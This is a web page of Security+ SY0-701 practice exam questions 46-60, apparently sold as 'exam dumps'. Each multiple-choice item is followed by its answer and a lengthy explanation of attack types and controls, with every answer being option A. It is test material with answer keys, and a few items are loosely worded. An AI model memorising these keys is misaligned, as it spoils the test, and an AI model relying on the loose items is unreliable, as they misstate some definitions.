CompTIA SY0-701 CompTIA Security+ Exam Dumps and Practice Test Questions Set 4 Q46-60

Visit here for our full CompTIA SY0-701 exam dumps and practice test questions.

Question 46

Which type of attack attempts to intercept and potentially alter communications between two parties without their knowledge?

A) Man-in-the-middle (MITM)
B) Phishing
C) Ransomware
D) Trojan

Answer:  A) Man-in-the-middle (MITM)

Explanation:

A man-in-the-middle attack occurs when an attacker intercepts communications between two parties, with the potential to eavesdrop, modify, or inject malicious content into the conversation. MITM attacks can target web sessions, email communications, or network traffic. The attacker positions themselves between the client and server, capturing data such as credentials, personal information, or session tokens. Common MITM attack methods include ARP spoofing, DNS spoofing, HTTPS stripping, and Wi-Fi eavesdropping. Security+ candidates must understand MITM attacks because they highlight the need for encryption, secure authentication, and verification of communication integrity. By intercepting traffic, attackers can compromise confidentiality, manipulate data, or impersonate one party to the other, creating both technical and operational risks.

Phishing, the second choice, is a social engineering attack aimed at tricking users into revealing credentials or sensitive data. Phishing requires user interaction and deception but does not intercept communications passively between two parties. While phishing can lead to MITM-like outcomes if credentials are stolen, it relies on manipulation rather than direct interception of traffic.

Ransomware, the third choice, encrypts files or locks systems to demand payment. It focuses on extortion rather than intercepting or altering communications. Ransomware affects availability and confidentiality of data on infected systems but does not involve monitoring or modifying real-time communications.

Trojans, the fourth choice, are malware disguised as legitimate programs to trick users into executing them. Trojans can facilitate MITM attacks if they install spyware or network manipulation tools, but they are not inherently interception attacks. Trojans require user execution, whereas MITM operates at the network or communication level to intercept traffic between parties.

The correct answer is man-in-the-middle because it specifically targets communications between two parties to intercept or alter data without their knowledge. Mitigation measures include end-to-end encryption, certificate verification, secure key management, and network monitoring. Security+ candidates must understand MITM to implement proactive measures, detect anomalies, and ensure communication integrity, demonstrating the importance of encryption and authentication in protecting sensitive communications.

Question 47

Which type of attack targets weaknesses in user passwords to gain unauthorized access to systems?

A) Dictionary attack
B) SQL injection
C) Cross-site scripting
D) Worm

Answer:  A) Dictionary attack

Explanation:

A dictionary attack is a method where attackers attempt to gain unauthorized access by systematically trying words from a precompiled list of common passwords or dictionary words. Unlike brute-force attacks, which attempt all possible combinations, dictionary attacks focus on likely password choices, taking advantage of weak or predictable passwords. Automated tools accelerate this process, and attackers often combine dictionary attacks with password lists obtained from previous breaches. Security+ candidates must understand dictionary attacks because they emphasize the importance of strong, complex passwords, password policies, and multi-factor authentication. A successful dictionary attack can compromise accounts, expose sensitive data, and allow lateral movement within networks. Organizations mitigate this threat by enforcing password complexity, expiration policies, account lockouts, and monitoring failed login attempts.

SQL injection, the second choice, is a web application vulnerability that manipulates databases through unsanitized inputs. While SQL injection can extract passwords from databases, it does not systematically guess passwords; it exploits technical flaws in applications rather than weak password selection.

Cross-site scripting, the third choice, injects malicious scripts into web pages to compromise users. XSS primarily targets session tokens, cookies, and user interactions within a website, not password guessing. While it may indirectly lead to credential theft, it is not focused on brute-force password attacks.

Worms, the fourth choice, are self-replicating malware that spread across networks without user action. Worms do not attempt to guess passwords; their primary goal is propagation, often delivering other payloads such as ransomware or Trojans.

The correct answer is dictionary attack because it specifically targets weak or predictable passwords to gain unauthorized access. Security+ candidates should understand attack techniques, automated tools, and mitigation strategies, including complex passwords, multi-factor authentication, and monitoring of login attempts. Dictionary attacks illustrate the vulnerability of predictable credentials and the importance of password hygiene in organizational security.

Question 48

Which type of attack modifies DNS responses to redirect users to malicious websites?

A) DNS spoofing
B) Ransomware
C) Phishing
D) Rootkit

Answer:  A) DNS spoofing

Explanation:

DNS spoofing, also known as DNS cache poisoning, is an attack in which attackers alter DNS responses to redirect users to malicious websites. By injecting false DNS information into a cache or manipulating server responses, attackers can make legitimate domain names resolve to IP addresses controlled by them. Users may unknowingly provide sensitive information, download malware, or access fraudulent sites. DNS spoofing impacts confidentiality, integrity, and trust in network communications. Security+ candidates must understand DNS spoofing because it demonstrates how attackers can manipulate fundamental network services to conduct widespread attacks and gain unauthorized access to user data. Preventive measures include DNSSEC, monitoring for unexpected DNS changes, secure configurations, and validating DNS responses.

Ransomware, the second choice, encrypts or locks files to demand payment. While ransomware may be delivered via phishing links or malicious websites, it does not manipulate DNS directly to redirect traffic. Its focus is on extortion rather than infrastructure manipulation.

Phishing, the third choice, involves deceiving users to obtain sensitive information. Phishing attacks may rely on fake websites, but usually require users to click links rather than redirecting users via DNS manipulation. DNS spoofing can enhance phishing effectiveness, but it is a distinct technical attack.

Rootkits, the fourth choice, are stealthy malware designed to maintain persistent access and hide malicious activity. Rootkits do not target DNS infrastructure; their purpose is persistence and concealment on compromised hosts.

The correct answer is DNS spoofing because it directly manipulates domain name resolution to redirect users to malicious websites. Security+ candidates should understand attack methods, monitoring strategies, and protective measures such as DNSSEC, system integrity checks, and network monitoring to prevent DNS-based attacks. Awareness of DNS spoofing underscores the importance of trust verification, secure network configurations, and proactive monitoring in defending critical infrastructure.

Question 49

Which type of attack involves injecting malicious code into a web application to manipulate its behavior?

A) SQL injection
B) Phishing
C) Brute-force
D) DDoS

Answer:  A) SQL injection

Explanation:

SQL injection is a web application attack that occurs when an attacker inserts malicious SQL statements into an input field, allowing unauthorized access to a database. It exploits insufficient input validation and allows attackers to read, modify, or delete database records, escalate privileges, or bypass authentication mechanisms. SQL injection can compromise the confidentiality, integrity, and availability of data. Security+ candidates must understand SQL injection because it demonstrates the importance of secure coding practices, input validation, parameterized queries, and proper database configuration. Attackers may also combine SQL injection with other attacks, such as privilege escalation or lateral movement, making it a high-risk vulnerability in web environments.

Phishing, the second choice, is a social engineering technique aimed at obtaining credentials or sensitive information from users. Phishing relies on deception, not exploiting application code or database queries. While it can result in similar outcomes like account compromise, it is fundamentally different from SQL injection.

Brute-force attacks, the third choice, attempt to guess passwords or encryption keys systematically. Brute-force focuses on authentication credentials rather than exploiting web application vulnerabilities to manipulate data. SQL injection targets technical flaws in input handling, not the password guessing process.

DDoS attacks, the fourth choice, overwhelm systems with traffic to make them unavailable. While DDoS targets availability, SQL injection primarily targets data confidentiality and integrity. DDoS does not manipulate database queries or extract information.

The correct answer is SQL injection because it directly exploits web application input validation flaws to manipulate database behavior. Security+ candidates should understand prevention techniques, secure coding practices, and input validation methods to protect web applications. SQL injection emphasizes the critical need for secure software development life cycle processes, regular code review, and monitoring for suspicious queries to maintain database security and system integrity.

Question 50

Which attack method installs malware that remains hidden while providing unauthorized access?

A) Rootkit
B) Worm
C) Adware
D) Phishing

Answer:  A) Rootkit

Explanation:

A rootkit is a type of malware designed to provide attackers with persistent, hidden access to a system. It often integrates deeply into the operating system, modifying kernel-level processes, system files, or security controls to evade detection. Rootkits allow attackers to install additional malware, capture credentials, or monitor activity without triggering antivirus or monitoring tools. They are difficult to detect and often require specialized forensic tools or system restoration to remove. Security+ candidates must understand rootkits because they exemplify persistent threats and the importance of endpoint protection, integrity monitoring, secure boot mechanisms, and proactive incident response. Rootkits compromise confidentiality, integrity, and in some cases, availability, making them a critical concern for security professionals.

Worms, the second choice, self-replicate and propagate across networks without hiding their presence. While worms can deliver rootkits as payloads, they do not inherently conceal themselves like rootkits. The primary purpose of worms is distribution rather than stealth.

Adware, the third choice, delivers unwanted advertisements and may collect user data. Adware is generally visible to the user and does not provide hidden administrative control or persistent unauthorized access, differentiating it from rootkits.

Phishing, the fourth choice, is a social engineering attack designed to trick users into revealing sensitive information. Phishing does not provide ongoing hidden access or manipulate system processes; it relies on deception rather than system-level stealth.

The correct answer is rootkit because it is specifically designed to remain hidden while granting unauthorized access. Security+ candidates should understand rootkit detection, removal strategies, and preventive measures such as system integrity verification, endpoint protection, and monitoring for anomalous behavior. Rootkits illustrate the dangers of persistent malware and underscore the importance of layered defenses to maintain system security and integrity.

Question 51

Which security control aims to limit access to sensitive data by encrypting it, making it unreadable without a key?

A) Encryption
B) Firewall
C) Intrusion detection system
D) Antivirus

Answer:  A) Encryption

Explanation:

Encryption is a security control used to protect sensitive data by transforming it into an unreadable format unless the correct decryption key is applied. Encryption ensures confidentiality, one of the core elements of the CIA triad, and protects data at rest, in transit, or in use. Common encryption methods include symmetric encryption, where a single key is used for both encryption and decryption, and asymmetric encryption, which uses a public key for encryption and a private key for decryption. Security+ candidates must understand encryption because it provides critical protection against unauthorized data access, man-in-the-middle attacks, data theft, and information leakage. Encrypted communications, such as HTTPS for web traffic, secure email protocols, and virtual private networks, ensure that intercepted data cannot be interpreted without proper authorization.

Firewalls, the second choice, are preventive network controls that filter traffic based on defined rules. Firewalls do not encrypt data; they control access to networks and prevent unauthorized connections. While firewalls protect systems from external threats, they do not inherently make data unreadable to unauthorized users.

Intrusion detection systems, the third choice, monitor network traffic or system activities to detect suspicious behavior or potential attacks. IDS alerts administrators but does not provide confidentiality for sensitive data. Detection and encryption serve different purposes: IDS identifies potential threats, while encryption safeguards information from unauthorized access.

Antivirus software, the fourth choice, detects, removes, or quarantines malware on endpoints. Antivirus protects systems against malicious software but does not encrypt data to prevent unauthorized reading. While antivirus software contributes to overall security, it does not replace encryption for confidentiality.

The correct answer is encryption because it specifically ensures that data remains unreadable without authorized access. Security+ candidates should understand encryption algorithms, key management practices, and applications across file storage, network communications, and databases. Encryption helps mitigate the impact of data breaches, secures sensitive information from unauthorized disclosure, and supports compliance with regulatory standards. Implementing encryption effectively involves selecting strong algorithms, safeguarding keys, and ensuring that decrypted data is only available to authorized users, emphasizing its role as a cornerstone of data security strategies.

Question 52

Which type of attack attempts to flood a network with traffic to make systems unavailable to legitimate users?

A) Denial of Service (DoS)
B) Keylogger
C) Trojan
D) Cross-site scripting

Answer:  A) Denial of Service (DoS)

Explanation:

A denial of service attack is a cyberattack aimed at disrupting the availability of systems, networks, or applications by overwhelming them with excessive traffic or requests. DoS attacks consume resources such as CPU, memory, or bandwidth, rendering services inaccessible to legitimate users. Attackers may use automated scripts or exploit vulnerabilities to amplify the attack, impacting organizational operations, reputation, and revenue. Security+ candidates must understand DoS attacks because they illustrate the importance of monitoring, traffic filtering, redundancy, and incident response planning to ensure system availability. DoS attacks target the availability component of the CIA triad, and mitigation may involve firewalls, intrusion prevention systems, rate limiting, and cloud-based DDoS protection services.

Keyloggers, the second choice, capture user keystrokes to steal credentials or other sensitive data. Keyloggers compromise confidentiality, not availability. They operate stealthily on endpoints rather than overwhelming network resources to deny service.

Trojans, the third choice, are malware disguised as legitimate applications to trick users into executing them. Trojans may deliver additional payloads, but do not inherently generate traffic to disrupt service. They rely on user interaction rather than automated flooding.

Cross-site scripting, the fourth choice, injects malicious scripts into web applications to manipulate user sessions or steal cookies. XSS targets the integrity and confidentiality of user data rather than network availability. It requires user interaction on a vulnerable web application, not resource exhaustion.

The correct answer is denial of service because it explicitly targets availability by flooding systems or networks. Security+ candidates should understand the techniques, detection methods, and mitigation strategies for DoS attacks, including the importance of layered defenses, redundant infrastructure, and proactive traffic monitoring. Understanding DoS attacks reinforces the principle of maintaining system resilience and service continuity under high-volume attack conditions.

Question 53

Which type of attack occurs when an attacker injects scripts into web pages viewed by other users?

A) Cross-site scripting (XSS)
B) Phishing
C) Ransomware
D) Worm

Answer:  A) Cross-site scripting (XSS)

Explanation:

Cross-site scripting is a web application attack in which an attacker injects malicious scripts into web pages. When users access these pages, the script executes within their browser, potentially stealing session cookies, redirecting them to malicious sites, or performing unauthorized actions. XSS exploits insufficient input validation and output encoding in web applications, allowing attackers to target end users rather than directly attacking servers. Security+ candidates must understand XSS because it demonstrates the importance of secure coding practices, input sanitization, and browser security. XSS affects confidentiality, integrity, and trust in web applications and can lead to account compromise or credential theft if not mitigated. Preventive measures include validating inputs, encoding outputs, using content security policies, and monitoring for unusual activity on web applications.

Phishing, the second choice, is a social engineering attack designed to trick users into providing sensitive information. Phishing relies on deception, such as emails or fake websites, rather than executing scripts in users’ browsers. While phishing can result in similar outcomes like credential theft, it does not involve web application vulnerabilities.

Ransomware, the third choice, encrypts files or systems to demand payment. It affects availability and confidentiality but does not inject scripts into web pages. Ransomware relies on user action or system vulnerabilities rather than exploiting web input/output flaws like XSS.

Worms, the fourth choice, are self-replicating malware that propagate across networks without user intervention. Worms focus on spreading and may carry additional payloads, but they do not execute scripts within users’ browsers or target web page content.

The correct answer is cross-site scripting because it specifically involves injecting malicious scripts into web pages for execution by end users. Security+ candidates should understand XSS attack vectors, prevention techniques, and the importance of input validation and output encoding. Recognizing XSS emphasizes the need for secure development practices and monitoring of web applications to maintain confidentiality, integrity, and user trust.

Question 54

Which type of attack allows unauthorized users to gain access to systems by exploiting weak or default credentials?

A) Credential stuffing
B) Phishing
C) DDoS
D) Rootkit

Answer:  A) Credential stuffing

Explanation:

Credential stuffing is a cyberattack that leverages previously compromised username-password pairs to gain unauthorized access to systems. Attackers use automated tools to try these credentials across multiple websites or services, exploiting the common practice of password reuse. This attack targets the authentication process and relies on human behavior, particularly weak or reused credentials, rather than system vulnerabilities. Security+ candidates must understand credential stuffing because it emphasizes the importance of strong, unique passwords, multi-factor authentication, and monitoring for suspicious login attempts. Organizations can mitigate the risk by implementing rate limiting, anomaly detection, and alerts for unusual login patterns. Credential stuffing is particularly effective against web applications and cloud services with large user bases, highlighting the need for robust authentication policies.

Phishing, the second choice, is a social engineering attack aimed at tricking users into disclosing credentials or sensitive information. Phishing relies on user interaction rather than exploiting reused credentials across multiple systems.

DDoS attacks, the third choice, overwhelm systems with traffic to make services unavailable. DDoS targets availability, not authentication or access control, and does not leverage stolen credentials.

Rootkits, the fourth choice, are stealthy malware that maintain persistent access and hide malicious activity on compromised hosts. Rootkits compromise system integrity and control, but do not exploit weak passwords or credential reuse.

The correct answer is credential stuffing because it specifically exploits reused or weak credentials to gain unauthorized access. Security+ candidates should understand attack vectors, automated attack tools, and countermeasures, including multi-factor authentication, strong password policies, and monitoring for login anomalies. Credential stuffing illustrates the importance of secure authentication practices, user education, and proactive defenses in protecting sensitive systems and accounts from compromise.

Question 55

Which type of attack targets the software supply chain to insert malicious code before it reaches end users?

A) Supply chain attack
B) Phishing
C) SQL injection
D) Worm

Answer:  A) Supply chain attack

Explanation:

A supply chain attack occurs when attackers compromise software or hardware components at the source or during distribution to insert malicious code, which then reaches end users. Attackers may target development environments, third-party vendors, or update mechanisms to deliver malware as part of legitimate software. High-profile examples include attacks on software repositories or compromised update servers that affect thousands of users. Supply chain attacks compromise integrity and trust in systems, making detection challenging since the malware is embedded in trusted components. Security+ candidates must understand supply chain attacks because they demonstrate the need for secure development practices, vendor management, code signing, and verification of software integrity before deployment. Preventive measures include validating vendor security policies, performing code audits, using cryptographic signatures, and implementing monitoring for anomalies in software behavior.

Phishing, the second choice, targets end users to steal credentials or sensitive information. Phishing relies on deception rather than compromising the software distribution process.

SQL injection, the third choice, exploits web application input vulnerabilities to manipulate databases. SQL injection focuses on application-level data compromise rather than targeting the supply chain for malware insertion.

Worms, the fourth choice, are self-replicating malware that spread across networks. While worms can propagate through compromised software, they do not inherently exploit the software supply chain as their primary attack vector.

The correct answer is supply chain attack because it specifically targets the software or hardware delivery process to compromise end users. Security+ candidates should understand attack vectors, vendor assessment, secure development lifecycle practices, code signing, and monitoring strategies to detect and prevent supply chain compromises. Supply chain attacks highlight the importance of trust verification, vendor security assurance, and proactive controls to maintain integrity and prevent malicious software distribution.

Question 56

Which type of attack targets mobile devices to exploit vulnerabilities in apps or the operating system?

A) Mobile malware
B) Phishing
C) Keylogger
D) DDoS

Answer:  A) Mobile malware

Explanation:

Mobile malware refers to malicious software specifically designed to target mobile devices, including smartphones and tablets. Attackers exploit vulnerabilities in mobile operating systems, poorly coded applications, or user behaviors to gain unauthorized access, steal data, or monitor activity. Mobile malware can include spyware, ransomware, banking trojans, adware, and rootkits. The consequences of mobile malware include theft of sensitive information such as contacts, credentials, and financial data, as well as device control or persistent access by attackers. Security+ candidates must understand mobile malware because mobile devices are increasingly integral to business operations and personal life, making them high-value targets. Mitigation strategies include installing apps from trusted sources, using mobile device management solutions, updating software regularly, implementing strong authentication, and educating users on safe mobile practices.

Phishing, the second choice, is a social engineering attack that can target mobile users, but it primarily relies on deception to obtain credentials rather than exploiting software vulnerabilities. Phishing attacks may complement mobile malware infections, but do not inherently target operating system or application weaknesses.

Keyloggers, the third choice, are malware programs that capture keystrokes to steal sensitive information. While keyloggers can exist on mobile devices, mobile malware encompasses a wider range of attack types, including spyware, ransomware, and trojans. Keyloggers are a subset of mobile malware, but the general category is more comprehensive in describing attacks against mobile systems.

DDoS attacks, the fourth choice, aim to overwhelm systems with traffic to disrupt availability. DDoS targets network infrastructure rather than the device itself and does not exploit mobile-specific vulnerabilities. While mobile devices can participate in DDoS attacks if compromised, they are generally victims rather than the intended target.

The correct answer is mobile malware because it specifically targets mobile devices and exploits vulnerabilities in operating systems or applications. Security+ candidates should understand the different types of mobile malware, how they propagate, and strategies for mitigation. This includes device security policies, application vetting, endpoint protection, user training, and secure mobile device management to protect sensitive information and maintain system integrity. Mobile malware emphasizes the need for a comprehensive approach to cybersecurity that considers all endpoints, including mobile platforms, which are increasingly integral to business and personal operations.

Question 57

Which security principle ensures that no single individual has complete control over critical functions?

A) Separation of duties
B) Principle of least privilege
C) Defense in depth
D) Encryption

Answer:  A) Separation of duties

Explanation:

Separation of duties is a security principle that divides critical responsibilities among multiple individuals to reduce the risk of fraud, errors, or malicious actions. By ensuring that no single person has unchecked authority, organizations can prevent abuse of power, safeguard assets, and enhance accountability. Examples include separating financial approval and payment execution or splitting administrative access in IT operations. Security+ candidates must understand the separation of duties because it is a fundamental organizational control that complements technical security measures. Implementation involves defining roles and responsibilities, enforcing role-based access controls, auditing actions, and periodically reviewing assignments. Separation of duties mitigates insider threats and helps maintain compliance with regulatory requirements by reducing the potential impact of malicious or negligent actions by a single individual.

The principle of least privilege, the second choice, restricts access rights to the minimum necessary for job functions. While least privilege limits exposure to data and systems, it does not inherently enforce the division of critical responsibilities between multiple people. Least privilege and separation of duties are complementary but address different aspects of security.

Defense in depth, the third choice, is a layered security approach that combines multiple preventive, detective, and corrective controls. While defense in depth enhances overall security, it does not specifically prevent any individual from having complete control over critical functions. It focuses on mitigating threats through redundancy rather than organizational role allocation.

Encryption, the fourth choice, protects the confidentiality of data by converting it into an unreadable format without a decryption key. Encryption safeguards information but does not address the organizational or procedural risk associated with concentrated authority.

The correct answer is separation of duties because it specifically ensures that critical functions are divided among multiple individuals to prevent misuse or fraud. Security+ candidates should understand its importance in governance, risk management, and compliance, as well as its role in complementing technical security measures. Effective separation of duties supports accountability, reduces insider threat risk, and reinforces organizational security policies.

Question 58

Which type of attack exploits software vulnerabilities to execute malicious code remotely?

A) Remote code execution (RCE)
B) Phishing
C) Keylogger
D) Adware

Answer:  A) Remote code execution (RCE)

Explanation:

Remote code execution is an attack in which attackers exploit software vulnerabilities to execute arbitrary code on a target system without physical access. RCE can result from unpatched software, misconfigured applications, or inadequate input validation. Successful RCE attacks allow attackers to gain unauthorized access, install malware, exfiltrate data, or manipulate system operations. Security+ candidates must understand RCE because it highlights the critical importance of patch management, secure coding practices, and vulnerability scanning. Mitigating RCE involves applying updates promptly, validating input, employing intrusion prevention systems, and monitoring for abnormal system behavior. RCE attacks can compromise confidentiality, integrity, and availability, making them highly impactful threats.

Phishing, the second choice, is a social engineering attack designed to trick users into providing sensitive information. Phishing does not exploit software vulnerabilities directly to execute code; instead, it manipulates human behavior. While phishing may lead to malware installation, it is distinct from RCE in that it relies on user action rather than a technical flaw in software.

Keyloggers, the third choice, capture user input, including credentials and sensitive data. While keyloggers can be delivered via RCE, they are not inherently RCE attacks. Keyloggers require installation and monitoring of endpoints, whereas RCE provides attackers with direct execution control over target systems.

Adware, the fourth choice, delivers unwanted advertisements and may collect user data. Adware is generally visible and does not exploit vulnerabilities for remote execution. While adware can be distributed as part of malware campaigns, it does not inherently grant attackers control over systems like RCE does.

The correct answer is remote code execution because it specifically allows attackers to exploit software vulnerabilities to run code on a target system. Security+ candidates should understand RCE vectors, prevention techniques, and monitoring strategies to secure systems from unauthorized execution. Understanding RCE emphasizes the importance of patch management, secure application design, and continuous vulnerability assessment to protect against potentially devastating attacks that threaten confidentiality, integrity, and availability.

Question 59

Which type of attack relies on automated attempts to guess credentials across multiple sites using previously leaked data?

A) Credential stuffing
B) Brute-force
C) Phishing
D) SQL injection

Answer:  A) Credential stuffing

Explanation:

Credential stuffing is an attack method where attackers use automated tools to test previously compromised username-password combinations across multiple websites or services. This attack exploits the widespread habit of password reuse, allowing attackers to gain unauthorized access without exploiting vulnerabilities in systems. Security+ candidates must understand credential stuffing because it targets authentication systems and emphasizes the importance of strong passwords, multi-factor authentication, and monitoring for unusual login patterns. Organizations mitigate credential stuffing by implementing rate limiting, anomaly detection, alerts for suspicious login activity, and enforcing unique credentials across services. Credential stuffing is highly effective due to the availability of breached credentials from previous attacks, which attackers can leverage at scale using automation.

Brute-force attacks, the second choice, attempt to guess passwords by systematically trying every possible combination. Brute-force does not rely on previously leaked credentials but instead exhausts all possibilities. While both brute-force and credential stuffing target authentication, credential stuffing is more efficient and less detectable because it uses likely valid combinations.

Phishing is a form of social engineering that primarily targets human behavior rather than technical vulnerabilities. Its main objective is to deceive users into voluntarily providing sensitive information, most commonly login credentials, personal identification, or financial data. Attackers often craft messages that appear to come from trusted sources, such as banks, online services, or internal company communications. These messages can be delivered through email, text messages, social media, or other communication channels. Unlike automated attacks, phishing relies heavily on user interaction and psychological manipulation. The success of a phishing attempt depends on the attacker convincing the target that the message is legitimate and prompting them to take a specific action, such as clicking a link, downloading an attachment, or entering information into a fake website. Because it relies on the user’s actions, phishing is not inherently an automated process, and it does not systematically attempt credential reuse across multiple sites. Instead, phishing campaigns may be carefully targeted or distributed broadly, but the immediate goal is to acquire credentials through deception rather than automation.

Although phishing itself is not an automated attack, the credentials obtained from a successful phishing attempt can be used in automated campaigns. For example, attackers may take stolen usernames and passwords and attempt to access multiple online services in what is known as credential stuffing. In credential stuffing, attackers exploit the common tendency of users to reuse passwords across different platforms, automating login attempts on various websites. However, it is important to note that phishing is the method of initial credential acquisition and not the automated process of testing those credentials. Phishing sets the stage for credential stuffing but does not itself perform automated attempts across multiple accounts.

SQL injection, on the other hand, is a technical attack that exploits vulnerabilities in web application input validation. When web applications fail to properly sanitize user input, attackers can insert malicious SQL commands into input fields such as login forms, search boxes, or URL parameters. These commands are executed by the backend database, potentially allowing attackers to read, modify, or delete data, execute administrative operations, or compromise the integrity of the system. The primary objective of SQL injection is data compromise and manipulation rather than acquiring credentials for use in other services. While SQL injection can be used to access sensitive login information stored in a database, it is not designed as a credential reuse attack and does not inherently involve automated login attempts across multiple sites. Its scope is generally limited to the target application and the database it interacts with, focusing on exploiting technical flaws rather than social engineering.

Phishing and SQL injection represent fundamentally different attack strategies. Phishing relies on deceiving users to reveal information voluntarily, making it a social engineering attack that depends on psychological manipulation rather than exploiting software vulnerabilities. It is not inherently automated, although credentials obtained through phishing may later be used in automated attacks such as credential stuffing. SQL injection, in contrast, targets technical flaws in web applications, exploiting improper input validation to manipulate databases and compromise data integrity. It does not systematically attempt to reuse credentials across multiple sites or rely on user deception, distinguishing it from phishing in both method and objective. These distinctions highlight the importance of understanding both human and technical factors in cybersecurity, as defending against these attacks requires addressing very different vulnerabilities and attack vectors.

The correct answer is credential stuffing because it specifically leverages automated testing of previously leaked credentials across multiple platforms. Security+ candidates should understand attack mechanisms, mitigation strategies, and the role of multi-factor authentication in reducing risk. Credential stuffing highlights the need for password uniqueness, monitoring, and proactive response to prevent account compromise across multiple services.

Question 60

Which type of attack combines social engineering with malicious links or attachments to compromise users?

A) Phishing
B) Worm
C) Rootkit
D) Denial of Service (DoS)

Answer:  A) Phishing

Explanation:

Phishing is a social engineering attack in which attackers deceive users to obtain sensitive information, credentials, or induce them to download malicious software. Phishing campaigns often use email, instant messaging, or social media to deliver links to fake websites or attachments containing malware. Attackers rely on human trust and a lack of awareness, rather than exploiting technical vulnerabilities directly. Security+ candidates must understand phishing because it is among the most prevalent attack types, highlighting the importance of user education, email filtering, endpoint protection, and multi-factor authentication. Successful phishing can result in credential theft, identity compromise, financial loss, or access to organizational networks, often serving as the initial step in more complex attacks such as ransomware deployment, data exfiltration, or lateral movement within networks.

Worms, the second choice, are self-replicating malware that spreads automatically across networks. Worms do not rely on social engineering; they propagate through system vulnerabilities or automated mechanisms rather than tricking users into clicking malicious links.

Rootkits are a type of malicious software specifically designed for stealth and persistence on a compromised system. Unlike more overt forms of malware, rootkits aim to hide their presence and maintain long-term access without being detected by users or security tools. They often operate at a deep level in the system, sometimes within the operating system kernel or even in firmware, giving them the ability to intercept system calls, hide processes, files, and network connections, and control system behavior. The primary goal of a rootkit is not immediate disruption or direct data theft but to create a hidden foothold for attackers. Once installed, a rootkit allows an attacker to maintain elevated privileges and potentially install additional malware, monitor system activity, or exfiltrate sensitive data over time. Rootkits are typically installed through other forms of malware, direct exploitation of vulnerabilities, or unauthorized access, but they do not inherently rely on social engineering, phishing, or deceptive emails to propagate. Their defining characteristic is covert control, making detection and removal extremely difficult, and giving attackers long-term, stealthy access to the system.

In contrast, denial of service attacks focus on disrupting the availability of systems, networks, or services. DoS attacks aim to make resources inaccessible to legitimate users by overwhelming servers, applications, or network infrastructure with excessive traffic or requests. The methodology can vary from simple floods of network packets to more sophisticated resource exhaustion techniques. Distributed denial of service attacks amplify this effect by using multiple compromised machines to generate traffic simultaneously, increasing the scale of disruption. Unlike rootkits, DoS attacks do not target the confidentiality or integrity of data. They do not aim to steal information or maintain hidden control over a system. Similarly, DoS attacks do not rely on social engineering or tricking users into performing certain actions. The focus is entirely on exhausting system resources to interrupt service availability.

While rootkits and denial of service attacks are both forms of malicious activity, they operate in fundamentally different domains and have distinct objectives. Rootkits prioritize stealth, persistence, and control, often remaining undetected for long periods and providing a platform for further attacks. In contrast, DoS attacks are overt and immediate, designed to cause disruption and make systems unavailable, without concern for hiding the attack or maintaining access. A rootkit may, in some cases, be used to facilitate a DoS attack by controlling compromised machines to generate traffic, but the rootkit itself is not inherently disruptive. Its main role is to maintain undetected access and enable long-term manipulation or surveillance.

Understanding the distinction between these types of attacks is critical for cybersecurity defenses. Defending against rootkits requires techniques focused on the detection of hidden processes, integrity verification of critical system files, and monitoring for unusual behavior that may indicate unauthorized control. On the other hand, mitigating DoS attacks involves strategies to handle traffic spikes, filter malicious requests, and maintain service availability even under attack. While both represent serious threats, their nature, goals, and methods are very different.

Rootkits are stealthy malware designed to provide persistent, hidden access and maintain control over a compromised system, without relying on social engineering. Denial of service attacks, by contrast, disrupt availability by overwhelming systems or networks with traffic, focusing on resource exhaustion rather than data compromise or deception. Each represents a distinct approach to malicious activity, emphasizing either concealment and control or overt disruption.

The correct answer is phishing because it specifically combines social engineering with malicious content to compromise users. Security+ candidates should understand phishing methods, recognition strategies, mitigation techniques, and organizational training programs. Phishing demonstrates the critical need for user awareness, layered defenses, and proactive monitoring to prevent credential theft and broader system compromise.